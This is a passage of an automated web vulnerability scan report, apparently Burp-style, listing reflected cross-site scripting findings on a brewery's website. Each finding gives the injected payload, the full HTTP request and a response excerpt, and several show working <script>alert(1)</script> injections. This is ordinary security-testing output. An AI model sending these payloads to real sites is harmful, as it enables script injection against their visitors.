<body id="company806cc"><a>6e5127e8258_page" class="company806cc">
...[SNIP]...

1.176. http://www.ninkasibrewing.com/company/content/css/basic.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /company/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1ab6"><a>2f1540286bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /companyd1ab6"><a>2f1540286bf/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="companyd1ab6"><a>2f1540286bf_page" class="companyd1ab6">
...[SNIP]...

1.177. http://www.ninkasibrewing.com/company/content/css/ninkasi.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /company/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e706a"><a>c8816d8ff3f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /companye706a"><a>c8816d8ff3f/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="companye706a"><a>c8816d8ff3f_page" class="companye706a">
...[SNIP]...

1.178. http://www.ninkasibrewing.com/company/content/css/print.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /company/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c8fc"><a>5627c06183b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /company5c8fc"><a>5627c06183b/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="company5c8fc"><a>5627c06183b_page" class="company5c8fc">
...[SNIP]...

1.179. http://www.ninkasibrewing.com/company/content/js/basic.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /company/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ca1b"><a>883628057d0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /company7ca1b"><a>883628057d0/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="company7ca1b"><a>883628057d0_page" class="company7ca1b">
...[SNIP]...

1.180. http://www.ninkasibrewing.com/company/content/js/combined.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /company/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f15af"><a>10c219e5d62 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /companyf15af"><a>10c219e5d62/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="companyf15af"><a>10c219e5d62_page" class="companyf15af">
...[SNIP]...

1.181. http://www.ninkasibrewing.com/company/content/js/combined.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /company/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95cc6"><a>4a3776524c8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /company95cc6"><a>4a3776524c8/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="company95cc6"><a>4a3776524c8_page" class="company95cc6">
...[SNIP]...

1.182. http://www.ninkasibrewing.com/contact/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /contact/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3673a"><a>3f6d411eb9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contact3673a"><a>3f6d411eb9a/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contact3673a"><a>3f6d411eb9a_page" class="contact3673a">
...[SNIP]...

1.183. http://www.ninkasibrewing.com/contact/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a1f4"><script>alert(1)</script>795f4542f78 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/?4a1f4"><script>alert(1)</script>795f4542f78=1 HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/?4a1f4"><script>alert(1)</script>795f4542f78=1" method="post">
...[SNIP]...

1.184. http://www.ninkasibrewing.com/contact/content/css/basic.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d20c6"><a>9742955dd12 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contactd20c6"><a>9742955dd12/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contactd20c6"><a>9742955dd12_page" class="contactd20c6">
...[SNIP]...

1.185. http://www.ninkasibrewing.com/contact/content/css/basic.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/css/basic.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efd65"><script>alert(1)</script>ad60b82afba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/contentefd65"><script>alert(1)</script>ad60b82afba/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/contentefd65"><script>alert(1)</script>ad60b82afba/css/basic.css" method="post">
...[SNIP]...

1.186. http://www.ninkasibrewing.com/contact/content/css/basic.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/css/basic.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42b42"><script>alert(1)</script>5fe47e91d14 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/css42b42"><script>alert(1)</script>5fe47e91d14/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/css42b42"><script>alert(1)</script>5fe47e91d14/basic.css" method="post">
...[SNIP]...

1.187. http://www.ninkasibrewing.com/contact/content/css/basic.css [REST URL parameter 4]  previous  next
<